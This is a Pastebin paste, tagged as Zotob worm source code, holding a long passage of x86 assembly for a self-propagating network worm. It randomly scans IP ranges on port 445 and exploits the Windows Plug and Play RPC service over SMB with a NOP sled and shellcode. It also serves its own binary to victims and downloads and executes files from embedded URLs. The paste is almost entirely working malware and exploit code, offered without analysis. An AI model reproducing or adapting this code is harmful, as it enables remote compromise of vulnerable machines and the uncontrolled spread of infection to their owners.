  526.     mov edx, esp
  527.     push 0x10
  528.     push edx
  529.     push ebx
  530.     call connect
  531.  
  532.     mov edx, esp
  533.     push 0x10
  534.     push esp
  535.     push edx
  536.     push ebx
  537.     call getsockname
  538.  
  539.     mov edx, [esp + 8]
  540.     push ebx
  541.     or eax, eax
  542.     jz .1
  543.  
  544.     mov esi, WSADATA
  545.     push esi        ;gethostbyname
  546.  
  547.     push WSADATA_LEN
  548.     push esi
  549.     call gethostname
  550.     call gethostbyname
  551.  
  552.     or eax, eax
  553.     jz .1
  554.     mov esi, [eax + 12]
  555.     lodsd
  556.     or eax, eax
  557.     jz .1
  558.     mov edx, [eax]
  559.  
  560. .1
  561. ;SHELLCODE IP
  562.     xor edx, SHELLCODE_XORIP
  563.     mov DWORD [shellcode + SHELLCODE_IP], edx
  564.     call closesocket
  565.  
  566.     leave
  567.     ret
  568.  
  569.  
  570. ;ARGS:  edi = DWORD array
  571. ;   ecx = array items
  572. @GetLocalIPs:
  573.  
  574.     push ecx
  575.     push byte 0
  576.     call gethostbyname
  577.  
  578.     pop ecx
  579.  
  580.     xor ebx, ebx
  581.     or eax, eax
  582.     jz .end
  583.  
  584.     mov esi, [eax + 12]     ;h_addr_list
  585.  
  586. .1
  587.     lodsd
  588.     or eax, eax
  589.     jz .end
  590.  
  591.     mov eax, [eax]
  592.     cmp al, 127
  593.     jnz .2
  594.  
  595.     inc ecx
  596.     jmp short .l1
  597.  
  598. .2
  599.     stosd
  600.     inc ebx
  601. .l1
  602.     loop .1
  603.  
  604. .end
  605.     mov [dwLocalIPs], ebx
  606.  
  607. .ret
  608.     ret
  609.  
  610.  
  611.  
  612.  
  613. ;ARG1:  IP address or 0
  614. ;
  615. @Scan:
  616.     mov ebp, esp
  617.     xor ebx, ebx
  618.  
  619.     push ebx
  620.     push ebx
  621.                 %xdefine     _445OPEN   [ebp - 0x4]
  622.                 %xdefine     NUM_IPDUP  [ebp - 0x8]
  623.     push ebx
  624.     push ebx    ;sin.zero
  625.     push ebx    ;ip
  626.  
  627.                 %xdefine     IP_4   [ebp - 0x11]    ;class D
  628.                 %xdefine     IP_3   [ebp - 0x12]    ;class C
  629.                 %xdefine     IP_2   [ebp - 0x13]    ;class B
  630.                 %xdefine     IP [ebp - 0x14]
  631.  
  632.  
  633.     push dword (2 | ((((445 << 8) & 0xFF00) | ((445 >> 8) & 0xFF)) << 16)  )
  634.  
  635.                 %xdefine     SIN    [ebp - 0x18]
  636.  
  637.     sub esp, 0x10
  638.                 %xdefine     RAND_SEED  [ebp - 0x1C]
  639.                 LOCAL_DATA_SIZE  EQU    (0x18 + 0x10)
  640.  
  641.     call @randinit
  642.     mov eax, [ebp + 4]
  643.     or eax, eax
  644.     jz @Net_loop
  645.  
  646.     mov IP, eax
  647.     jmp short @sock_arr
  648.  
  649. @Net_loop
  650.     mov byte IP_4, 0
  651.  
  652.     cmp dword _445OPEN, byte 0
  653.     jnle .c
  654. .r
  655.     call @GetRandomNet
  656.     mov IP, ebx
  657.     jmp short @sock_arr
  658. .c
  659.     inc byte IP_3       ; inc class C net
  660.     jnz @sock_arr
  661.     inc byte IP_2       ; inc class B
  662.     jz .r
  663.  
  664. @sock_arr
  665.     xor ecx, ecx
  666.     mov cl, 64
  667.  
  668. @sock_loop
  669.     inc byte IP_4
  670.     cmp byte IP_4, 0xFF
  671.     je @Select
  672.     push ecx            ; counter
  673.  
  674.         push byte 0
  675.         push byte 1
  676.         push byte 2
  677.         call socket
  678.         mov ebx, eax
  679.         push esp            ; ecx = TRUE
  680.         push FIONBIO
  681.         push ebx
  682.         call ioctlsocket
  683.  
  684.         push byte 0x10
  685.         lea eax, SIN
  686.         push eax
  687.         push ebx
  688.         call connect
  689.         call @sleep
  690.  
  691.     pop ecx
  692.     push ebx        ;save sockets on stack
  693.     loop @sock_loop
  694.  
  695. @Select
  696.     mov ch, 64
  697.     sub ch, cl
  698.     jz @end_loop        ; (<- should never happen)
  699.     movzx ecx, ch
  700.     mov esi, esp
  701.     mov ebx, esp        ; socket array
  702.     mov _445OPEN, ecx
  703.  
  704. .fd_set
  705.     lodsd
  706.     push eax        ; fd_array
  707.     call @sleep
  708.     loop .fd_set
  709.  
  710.     mov edx, _445OPEN
  711.     push edx        ; fd_count
  712.     mov esi, esp
  713.  
  714.     push edx        ; CloseSockArr (sock count <= 64)
  715.     push ebx        ; CloseSockArr (pointer to socket array)
  716.  
  717.     push ecx
  718.     push ecx
  719.     push esp        ; tv { 0,0 } poll
  720.     push ecx        ; exceptfds
  721.     push esi        ; writefds
  722.     push ecx        ; readfds
  723.     push ecx
  724.     push dword TIMEOUT  ; 5 sec.
  725.     call Sleep
  726.     call select
  727.     add esp, byte 8
  728.     mov _445OPEN, eax
  729.  
  730.     or eax, eax
  731.     jle @select_end     ; 0 | -1
  732.  
  733.     lodsd           ; fd_count
  734.     mov ecx, eax
  735.  
  736. .open_loop
  737.     lodsd           ; fd_array
  738.     call @PortOpen
  739.     call @sleep
  740.     loop .open_loop
  741.  
  742. @select_end
  743.     call @CloseSockArr      ; ebx, edx
  744. @end_loop
  745.  
  746.     mov esp, ebp
  747.     sub esp, LOCAL_DATA_SIZE
  748.  
  749.     cmp DWORD [CONNECTED], 0
  750.     je .Exit_Scan           ; disconnected
  751.  
  752.     mov eax, [OSVERSION]
  753.     or eax, eax
  754.     jns .2
  755.  
  756.     ;only for Win9x
  757.     cmp dword _445OPEN, byte 0
  758.  
  759.     jle .40
  760.     jmp short .240
  761.  
  762. .40
  763.     push dword 40 * 1000        ;40 sec.
  764.     jmp short .sleep
  765. .240
  766.     push dword 240 * 1000       ;4 min. (TIME_WAIT delay)
  767.  
  768. .sleep
  769.     call Sleep
  770.  
  771. .2
  772.     cmp byte IP_4, 0xFF
  773.     je  @Net_loop
  774.     jmp @sock_arr
  775.  
  776. .Exit_Scan
  777.     call ExitThread
  778.  
  779.  
  780.  
  781. @randinit:
  782.     call GetCurrentThreadId
  783.     mul ah
  784.     xchg al, ah
  785.     mul ax
  786.     shl eax, 16
  787.     mov ax, dx
  788.     push eax
  789.     call GetTickCount
  790.     pop ecx
  791.     mul ecx
  792.     rol eax, cl
  793.     mov RAND_SEED, eax
  794.     ret
  795.  
  796.  
  797. @sleep:
  798.     push ecx
  799.     push CS_LOOP
  800.     call EnterCriticalSection
  801.         push byte 1
  802.         call Sleep
  803.     push CS_LOOP
  804.     call LeaveCriticalSection
  805.     pop ecx
  806.     ret
  807.  
  808.  
  809. @CloseSockArr:
  810.     mov ebx, [esp + 4]  ; socket array
  811.     mov ecx, [esp + 8]  ; count
  812.  
  813. .close_loop:
  814.  
  815.     dec ecx
  816.     push ecx
  817.  
  818.     push dword [ebx + ecx * 4]
  819.     call closesocket
  820.     call @sleep
  821.  
  822.     pop ecx
  823.     inc ecx
  824.     loop .close_loop
  825.  
  826.     ret 8
  827.  
  828.  
  829. @PortOpen:      ; eax: socket
  830.     push ecx
  831.     push esi
  832.  
  833.     sub esp, byte 0x10  ; 0x10 bytes stack frame
  834.     mov edx, esp
  835.     push byte 0x10
  836.     push esp        ; len
  837.     push edx        ; sockaddr
  838.     push eax
  839.     call getpeername
  840.  
  841.     add esp, byte 8
  842.     or eax, eax
  843.     pop eax
  844.     jnz .end
  845.  
  846.     mov ecx, [dwLocalIPs]
  847.     mov edi, lpLocalIPs
  848.     repne scasd
  849.     je .end
  850.  
  851.     push esp    ;lpThreadId
  852.     push ecx    ;dwCreationFlags
  853.     push eax    ;lpParameter (IP)
  854.     push @AttackPnP
  855.     push STACK_SIZE
  856.     push ecx
  857.     call CreateThread
  858.     push eax
  859.     call CloseHandle
  860.  
  861. .end
  862.     call @WaitMaxThreads
  863.     add esp, byte 0x8
  864.     pop esi
  865.     pop ecx
  866.     ret
  867.  
  868.  
  869. @rand:
  870.  push ecx
  871.  mov eax, RAND_SEED
  872.  mov cl, al
  873.  rol eax, cl    ; rotate left, bits shifted out reenter on the right
  874.  push eax
  875.  push ecx
  876.  call GetTickCount
  877.  mov cl, al
  878.  ror eax, cl
  879.  pop ecx
  880.  rol eax, cl
  881.  pop edx
  882.  add edx, eax       ;add some big number
  883.  mov eax, edx
  884.  mov ecx, eax
  885.  mul ecx
  886.  mov cl, al
  887.  rol eax, cl
  888.  xor eax, edx
  889.  mov RAND_SEED, eax ; store random seed
  890.  
  891.  pop ecx
  892.  xor edx, edx       ; zero edx for edx:eax MOD ecx
  893.  div ecx        ; divide by ecx, remainder in edx
  894.  xchg eax, edx
  895.  
  896.  ret
  897.  
  898.  
  899. ;RETURN:    ebx
  900. ;
  901. @GetRandomNet:
  902.     xor ebx, ebx
  903.  
  904.     push byte 3
  905.     pop ecx
  906.  
  907. .rnd
  908.     push ecx
  909.     mov cx, 256
  910.     call @rand
  911.  
  912.     pop ecx
  913.     push ecx
  914.     sub ecx, byte 3
  915.     neg ecx
  916.     imul ecx, byte 8
  917.     shl eax, cl
  918.     pop ecx
  919.     or eax, ebx
  920.  
  921.     cmp al, 0
  922.     je .rnd
  923.     cmp al, 10
  924.     je .rnd
  925.     cmp al, 127
  926.     je .rnd
  927.     cmp al, 223
  928.     ja .rnd
  929.  
  930.     cmp al, 172
  931.     jne .b
  932.     cmp ah, 16
  933.     jb .b
  934.     cmp ah, 31
  935.     jbe .rnd
  936. .b
  937.     cmp al, 192
  938.     jne .next
  939.     cmp ah, 168
  940.     je  .rnd
  941.  
  942. .next:
  943.     or ebx, eax
  944.     loop .rnd
  945.    
  946.     ret
  947.    
  948.  
  949.  
  950. ;ARG1:  ip address
  951. ;
  952. @AttackPnP:
  953.     mov ebp, esp
  954.     sub esp, 8196
  955.  
  956. _recvbuf    EQU     4100    ;[ebp - 4100]
  957. _recvbuf_LEN    EQU     4096
  958. _packet     EQU     8196    ;[ebp - 8196]
  959. _packet_LEN EQU     4096
  960.  
  961.  
  962.  
  963.     call @WaitMaxThreads
  964.     push byte 1
  965.     call @AddThreadNum  ;inc THREADNUM
  966. ;int3
  967.     xor eax, eax
  968.     push eax
  969.     push eax
  970.     push DWORD [ebp + 4]    ;IP address
  971.     push DWORD (2 | ((((445 << 8)&0xFF00) | ((445 >> 8)&0xFF)) << 16) )
  972.  
  973.     push eax
  974.     push 1
  975.     push 2
  976.     call socket
  977.     xchg ebx, eax
  978.  
  979.     mov edx, esp
  980.     push 0x10
  981.     push edx
  982.     push ebx
  983.     call connect
  984.     or eax, eax
  985.     jnz NEAR .cs
  986.  
  987.     push eax
  988.     push SMB_Negotiate_LEN
  989.     push SMB_Negotiate
  990.     push ebx
  991.     call send
  992.     inc eax
  993.     jz NEAR .cs
  994.  
  995.     lea edi, [ebp - _recvbuf]
  996.  
  997.     push SMB_RECV_TIMEOUT
  998.     push _recvbuf_LEN
  999.     push edi
  1000.     call @arecv
  1001.     cmp eax, 10
  1002.     jle NEAR .cs
  1003.     cmp byte [edi + 9], 0
  1004.     jne NEAR .cs
  1005.  
  1006.     push 0
  1007.     push SMB_SessionSetupAndX_LEN
  1008.     push SMB_SessionSetupAndX
  1009.     push ebx
  1010.     call send
  1011.     inc eax
  1012.     jz NEAR .cs
  1013.  
  1014.     push SMB_RECV_TIMEOUT
  1015.     push _recvbuf_LEN
  1016.     push edi
  1017.     call @arecv
  1018.     cmp eax, 10
  1019.     jle NEAR .cs
  1020.  
  1021.     push 0
  1022.     push SMB_SessionSetupAndX2_LEN
  1023.     push SMB_SessionSetupAndX2
  1024.     push ebx
  1025.     call send
  1026.     inc eax
  1027.     jz NEAR .cs
  1028.  
  1029.     push SMB_RECV_TIMEOUT
  1030.     push _recvbuf_LEN
  1031.     push edi
  1032.     call @arecv
  1033.     cmp eax, 10
  1034.     jle NEAR .cs
  1035.     cmp byte [edi + 9], 0
  1036.     jne NEAR .cs
  1037.  
  1038.     push ebx    ;sock
  1039.  
  1040.     push byte SMB_TreeConnectAndX_LEN
  1041.     lea ebx, [ebp - _packet]
  1042.     lea edi, [ebp - _recvbuf]
  1043.     push SMB_TreeConnectAndX
  1044.     push ebx
  1045.     lea ebx, [ebx + SMB_TreeConnectAndX_LEN]
  1046.     call memcpy
  1047.  
  1048.     push DWORD [ebp + 4]    ;IP
  1049.     call inet_ntoa
  1050.     push eax
  1051.     push STR_IPC
  1052.     push edi
  1053.     call wsprintf
  1054.  
  1055.     push edi
  1056.     push ebx
  1057.     call @convert_name
  1058.  
  1059.     xor eax, eax
  1060.     cld
  1061.     or ecx, -1
  1062.     add esp, 24
  1063.     repne scasb     ;edi = _recvbuf
  1064.     not ecx
  1065.     lea ecx, [ecx + ecx - 2]
  1066.     mov eax, ecx
  1067.     add ecx, 9
  1068.     AND eax, 0xFFFF
  1069.     add ebx, eax
  1070.  
  1071.     lea edx, [ebx + SMB_TreeConnectAndX__LEN]
  1072.     mov [ebp - _packet + SMB_TreeConnectAndX_LEN - 3], cl
  1073.  
  1074.     mov eax, [SMB_TreeConnectAndX_]
  1075.     mov [ebx], eax
  1076.     mov eax, [SMB_TreeConnectAndX_ + 4]
  1077.     mov [ebx + 4], eax
  1078.  
  1079.     pop ebx     ;sock
  1080.     lea eax, [ebp - _packet]
  1081.     sub edx, eax
  1082.     push 0
  1083.     lea eax, [edx - 4]
  1084.     push edx
  1085.     mov [ebp - _packet + 3], al
  1086.     lea eax, [ebp - _packet]
  1087.     push eax
  1088.  
  1089.     push ebx
  1090.     call send
  1091.     inc eax
  1092.     jz NEAR .cs
  1093.  
  1094.  
  1095.     lea edi, [ebp - _recvbuf]
  1096.  
  1097.     push SMB_RECV_TIMEOUT
  1098.     push _recvbuf_LEN
  1099.     push edi
  1100.     call @arecv
  1101.     cmp eax, 10
  1102.     jle NEAR .cs
  1103.     cmp byte [edi + 9], 0
  1104.     jne NEAR .cs
  1105.        
  1106.     push 0
  1107.     push SMB_PipeRequest_browser_LEN
  1108.     push SMB_PipeRequest_browser
  1109.     push ebx
  1110.     call send
  1111.     inc eax
  1112.     jz NEAR .cs
  1113.  
  1114.     push SMB_RECV_TIMEOUT
  1115.     push _recvbuf_LEN
  1116.     push edi
  1117.     call @arecv
  1118.     cmp eax, 10
  1119.     jle NEAR .cs
  1120.     cmp byte [edi + 9], 0
  1121.     jne NEAR .cs
  1122.  
  1123.     push 0
  1124.     push SMB_PNPEndpoint_LEN
  1125.     push SMB_PNPEndpoint
  1126.     push ebx
  1127.     call send
  1128.     inc eax
  1129.     jz NEAR .cs
  1130.  
  1131.     push SMB_RECV_TIMEOUT
  1132.     push _recvbuf_LEN
  1133.     push edi
  1134.     call @arecv
  1135.     cmp eax, 10
  1136.     jle NEAR .cs
  1137.     cmp byte [edi + 9], 0
  1138.     jne NEAR .cs
  1139.  
  1140. ;int3
  1141.     mov eax, 0x90909090
  1142.     mov ecx, (_packet_LEN/4)
  1143.     lea edi, [ebp - _packet]
  1144.     push edi
  1145.     rep stosd
  1146.     pop edi
  1147.  
  1148.     push RPC_call_LEN
  1149.     push RPC_call
  1150.     push edi
  1151.     call memcpy
  1152.  
  1153.     lea edi, [ebp - _packet + RPC_call_LEN]
  1154.     push shellcode_LEN
  1155.     push shellcode
  1156.     push edi
  1157.     call memcpy
  1158.  
  1159.     push RPC_call_end_LEN
  1160.     push RPC_call_end
  1161.     lea esi, [ebp - _packet + 2196 - RPC_call_end_LEN]
  1162.     push esi
  1163.     call memcpy
  1164.     add esp, 36
  1165.  
  1166.     push 0      ;send
  1167.     push 2196   ;`` ``
  1168.     lea edi, [ebp - _packet]
  1169.     push edi    ;`` ``
  1170.     push ebx    ;`` ``
  1171.     call send
  1172.  
  1173.  
  1174.     push SMB_RECV_TIMEOUT
  1175.     push _recvbuf_LEN
  1176.     lea eax, [ebp - _recvbuf]
  1177.     push eax
  1178.     call @arecv
  1179.  
  1180. .cs
  1181.     push ebx
  1182.     call closesocket
  1183.  
  1184. .exit
  1185.     push byte -1
  1186.     call @AddThreadNum  ;dec THREADNUM
  1187.  
  1188.     push byte 0
  1189.     call ExitThread
  1190.  
  1191.  
  1192.  
  1193. ;ARGS:  ebx = socket
  1194. ;ARG1:  buffer
  1195. ;ARG2:  length
  1196. ;ARG3:  seconds timeout
  1197. ; RETURN: bytes received
  1198. ;
  1199. @arecv:
  1200.     push ebp
  1201.     mov ebp, esp
  1202.  
  1203.     sub esp, 260
  1204.     push ebx    ;fd_array[0]
  1205.     push 1      ;fd_count
  1206.     mov edx, esp
  1207.  
  1208.     xor eax, eax
  1209.     push eax
  1210.     push DWORD [ebp + 0x10]     ;seconds timeout
  1211.  
  1212.     push esp            ;struct timeval
  1213.     push eax
  1214.     push eax
  1215.     push edx
  1216.     push eax
  1217.     call select
  1218.     or eax, eax
  1219.     jle .end
  1220.  
  1221.     push 0
  1222.     push DWORD [ebp + 0xC]
  1223.     push DWORD [ebp + 0x8]
  1224.     push ebx
  1225.     call recv
  1226.  
  1227. .end
  1228.     leave
  1229.     ret 0xC
  1230.  
  1231.  
  1232. ;ARG1:  output buffer
  1233. ;ARG2:  input buffer
  1234. ;
  1235. @convert_name:
  1236.  
  1237.     push ebp
  1238.     mov ebp, esp
  1239.     push ebx
  1240.     push edi
  1241.  
  1242.     cld
  1243.     or ecx, -1
  1244.     mov ebx, [ebp + 0xC]    ;input buffer
  1245.     mov edi, ebx
  1246.     xor eax, eax
  1247.     repne scasb
  1248.  
  1249.     not ecx
  1250.     lea eax, [ecx + ecx - 2]
  1251.     sub ecx, 2
  1252.     add eax, [ebp + 8]  ;output buffer
  1253.     lea edx, [eax - 1]
  1254.  
  1255. .1
  1256.     cmp ecx, -1
  1257.     je .end
  1258.  
  1259.     mov byte [edx], 0
  1260.     dec edx
  1261.     movzx eax, byte [ecx + ebx]
  1262.     dec ecx
  1263.     mov byte [edx], al
  1264.     dec edx
  1265.  
  1266.     jmp short .1
  1267.  
  1268. .end
  1269.     pop edi
  1270.     pop ebx
  1271.     leave
  1272.     ret 8
  1273.  
  1274.  
  1275. ;ARGS: 1 inc    -1 dec
  1276. ;Registers used: ALL
  1277. ;
  1278. @AddThreadNum:
  1279.     pop eax     ;RET/clean stack
  1280.     pop ebx
  1281.     push eax
  1282.  
  1283.     push CS_THREADNUM
  1284.     call EnterCriticalSection
  1285.  
  1286.         add dword [THREADNUM], ebx  ;THREADNUM
  1287.  
  1288.     push CS_THREADNUM
  1289.     call LeaveCriticalSection
  1290.     ret
  1291.  
  1292.  
  1293. @WaitMaxThreads:
  1294. .loop1
  1295.     cmp dword [THREADNUM], MAX_THREADS
  1296.     jle .end
  1297.     push dword TIMEOUT
  1298.     call Sleep
  1299.  
  1300.     jmp short .loop1
  1301. .end
  1302.     ret
  1303.  
  1304.  
  1305. ;ARG1:  client socket
  1306. @ServerThread:
  1307.     mov ebp, esp
  1308.  
  1309.     mov ebx, [ebp + 4]  ;client socket
  1310.     push ebx
  1311.  
  1312.     push 0
  1313.     push DWORD [dwFileSize]
  1314.     push DWORD [dwFilePointer]
  1315.     push ebx
  1316.     call send
  1317.  
  1318.     call closesocket
  1319.  
  1320.     push 0
  1321.     call ExitThread
  1322.  
  1323.  
  1324.  
  1325. @FileServer:
  1326.     mov ebp, esp
  1327. ;int3
  1328.     xor eax, eax
  1329.     push eax
  1330.     push eax
  1331.     push OPEN_EXISTING
  1332.     push eax
  1333.     push FILE_SHARE_READ
  1334.     push GENERIC_READ
  1335.     mov esi, szFileName
  1336.     push esi
  1337.  
  1338.     push dwFileNameLen
  1339.     push esi
  1340.     push eax
  1341.     call GetModuleFileName
  1342.  
  1343.     call CreateFile
  1344.     mov esi, eax
  1345.     inc eax
  1346.     jz .sock1
  1347.  
  1348.     xor eax, eax
  1349.     push eax        ;MapViewOfFile
  1350.     push eax        ;`` ``
  1351.     push eax        ;`` ``
  1352.  
  1353.     push eax        ;CreateFileMapping
  1354.  
  1355.     push eax
  1356.     push esi
  1357.     call GetFileSize
  1358.     mov [dwFileSize], eax
  1359.  
  1360.     push eax
  1361.     push 0
  1362.     push PAGE_READONLY
  1363.     push 0
  1364.     push esi
  1365.     call CreateFileMapping
  1366.  
  1367.     push FILE_MAP_READ
  1368.     push eax
  1369.     call MapViewOfFile
  1370.  
  1371.     mov [dwFilePointer], eax
  1372.  
  1373.  
  1374. .sock1
  1375.     xor eax, eax
  1376.     push eax
  1377.     push eax
  1378.     push eax
  1379.     push 2
  1380.  
  1381.     push eax
  1382.     push 1
  1383.     push 2
  1384.     call socket
  1385.     xchg ebx, eax
  1386.  
  1387.     mov edx, esp
  1388.  
  1389.     push 0x10
  1390.     push edx
  1391.     push ebx
  1392.     call bind
  1393.  
  1394.     mov edx, esp
  1395.     push 0x10
  1396.  
  1397.     push esp
  1398.     push edx
  1399.     push ebx
  1400.     call getsockname
  1401.     pop edx
  1402.     pop edx
  1403.     shr edx, 16
  1404.  
  1405.  
  1406. ;SHELLCODE PORT
  1407.     xor dx, SHELLCODE_XORPORT
  1408.     mov WORD [shellcode + SHELLCODE_PORT], dx
  1409.  
  1410.     push SOMAXCONN
  1411.     push ebx
  1412.     call listen
  1413.  
  1414. .acceptLoop
  1415.     push 1
  1416.     call Sleep
  1417.  
  1418.     push 0
  1419.     push 0
  1420.     push ebx
  1421.     call accept
  1422.     cmp eax, -1
  1423.     je .acceptLoop
  1424.  
  1425.     xor ecx, ecx
  1426.     push esp
  1427.     push ecx
  1428.     push eax        ;client socket
  1429.     push @ServerThread
  1430.     push ecx
  1431.     push ecx
  1432.     call CreateThread
  1433.     push eax
  1434.     call CloseHandle
  1435.  
  1436.     jmp short .acceptLoop       ;infinite loop
  1437.     call ExitThread
  1438.  
  1439.  
  1440.  
  1441. ;ARGS:      edi = url
  1442. ;RETURN:    ebx = filename saved
  1443. ;
  1444. @GetUrl:
  1445.     push ebp
  1446.     mov ebp, esp
  1447.     push edi    ;[ebp - 4]
  1448.     xor ecx, ecx
  1449.     push ecx    ;[ebp - 8]
  1450.     push ecx    ;[ebp - 0xC]
  1451.  
  1452. %define     DL_FILENAME [ebp - 8]
  1453. %define     HTTP_NEWLINE    [ebp - 0xC]
  1454.  
  1455.     mov al, '/'
  1456.     dec ecx
  1457.     cld
  1458.     repne scasb
  1459.     not ecx
  1460.     sub esp, ecx
  1461.     AND esp, 0xfffffff0
  1462.  
  1463.     dec ecx
  1464.     mov esi, [ebp - 4]
  1465.     mov edi, esp
  1466.     rep movsb
  1467.     mov BYTE [edi], cl
  1468.  
  1469.  
  1470.     push esp    ;host
  1471.     push esi    ;url
  1472.     push HTTP_FMT   ;'GET %s HTTP/1.1\r\nHost: %s\r\n\r\n'
  1473.     push HTTP_BUFFER
  1474.     call wsprintf
  1475.     add esp, 16
  1476.  
  1477.  
  1478.     push esp
  1479.     call gethostbyname
  1480.  
  1481.     or eax, eax
  1482.     jz .end
  1483.     mov esi, [eax + 12]
  1484.     lodsd
  1485.     or eax, eax
  1486.     jz .end
  1487.     mov edx, [eax]
  1488.  
  1489.     xor eax, eax
  1490.     push eax
  1491.     push eax
  1492.     push edx
  1493.     push DWORD (2 | ((((80 << 8) & 0xFF00) | ((80 >> 8) & 0xFF)) << 16) )
  1494.  
  1495.     push eax
  1496.     push 1
  1497.     push 2
  1498.     call socket
  1499.     xchg ebx, eax
  1500.  
  1501.     mov edx, esp
  1502.     push 0x10
  1503.     push edx
  1504.     push ebx
  1505.     call connect
  1506.     or eax, eax
  1507.     jnz .cs
  1508.  
  1509.     mov edi, [ebp - 4]
  1510.     push edi
  1511.     call lstrlen
  1512.     add edi, eax
  1513.     std
  1514.     mov al, '/'
  1515.     or ecx, -1
  1516.     repne scasb
  1517.     cld
  1518.     inc edi
  1519.     inc edi
  1520.     mov DL_FILENAME, edi
  1521.  
  1522.     xor eax, eax
  1523.     push eax
  1524.     push eax
  1525.     push CREATE_ALWAYS
  1526.     push eax
  1527.     push FILE_SHARE_READ
  1528.     push GENERIC_WRITE
  1529.     push edi
  1530.     call CreateFile
  1531.     mov esi, eax
  1532.     inc eax
  1533.     jz .cs
  1534.  
  1535.     push 0
  1536.     mov edi, HTTP_BUFFER
  1537.     push edi
  1538.     call lstrlen
  1539.     push eax
  1540.     push edi
  1541.     push ebx
  1542.     call send
  1543.  
  1544.  
  1545. .recvLoop
  1546.     mov edi, HTTP_BUFFER
  1547.     push 60
  1548.     push HTTP_BUFFER_LEN
  1549.     push edi
  1550.     call @arecv
  1551.     or eax, eax
  1552.     jle .recvEnd
  1553.  
  1554.     cmp BYTE HTTP_NEWLINE, 0
  1555.     jne .write
  1556.  
  1557. .1
  1558.     mov ecx, 0x0A0D0A0D
  1559.     cmp [edi], ecx
  1560.     je .2
  1561.  
  1562.     dec eax
  1563.     cmp eax, 3
  1564.     jle .recvLoop
  1565.  
  1566.     inc edi
  1567.     jmp short .1
  1568. .2
  1569.     add edi, 4
  1570.     sub eax, 4
  1571.     inc BYTE HTTP_NEWLINE
  1572.  
  1573. .write
  1574.     push 0
  1575.     push esp
  1576.     push eax
  1577.     push edi
  1578.     push esi
  1579.     call WriteFile
  1580.     jmp short .recvLoop
  1581.  
  1582. .recvEnd
  1583.     push esi
  1584.     call CloseHandle
  1585.  
  1586. .cs
  1587.     push ebx
  1588.     call closesocket
  1589.  
  1590.  
  1591. .end
  1592.     mov ebx, DL_FILENAME
  1593.     leave
  1594.     ret
  1595.  
  1596.  
  1597. @Download:
  1598.     push ebp
  1599.     mov ebp, esp
  1600.  
  1601.     mov edi, URLS
  1602.  
  1603. .nextUrl
  1604.     cmp byte [edi], 0
  1605.     je .end
  1606.  
  1607.     push edi
  1608.     call @GetUrl
  1609.  
  1610.     pop edi
  1611.     xor eax, eax
  1612.     or ecx, -1
  1613.     cld
  1614.     repne scasb
  1615.  
  1616.     mov al, FL_EXECUTE_URL
  1617.     scasb
  1618.     jne .nextUrl
  1619.  
  1620.     or ebx, ebx
  1621.     jz .nextUrl
  1622.  
  1623. ;execute file
  1624.     lea esp, [ebp - 0x54]
  1625.     push esp
  1626.  
  1627.     mov esi, edi
  1628.     lea edi, [ebp - 0x44]
  1629.  
  1630.     push edi
  1631.     push byte 0x44
  1632.     pop ecx
  1633.     mov [edi], ecx
  1634.     inc edi
  1635.     xor eax, eax
  1636.     rep stosb
  1637.  
  1638.     mov cl, 7
  1639. .push0
  1640.     push eax
  1641.     loop .push0
  1642.  
  1643.     push ebx
  1644.     call CreateProcess
  1645.     call CloseHandle
  1646.     call CloseHandle
  1647.  
  1648.     mov edi, esi
  1649.     jmp short .nextUrl
  1650.  
  1651.  
  1652. .end
  1653.     leave
  1654.     ret
  1655.  
  1656.  
  1657. %include        "CBack.asm"
  1658.  
  1659.  
  1660.  
  1661. VIRUS_SIZE      EQU         ($- _entry)
Tags: worm sourceocde zotob
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!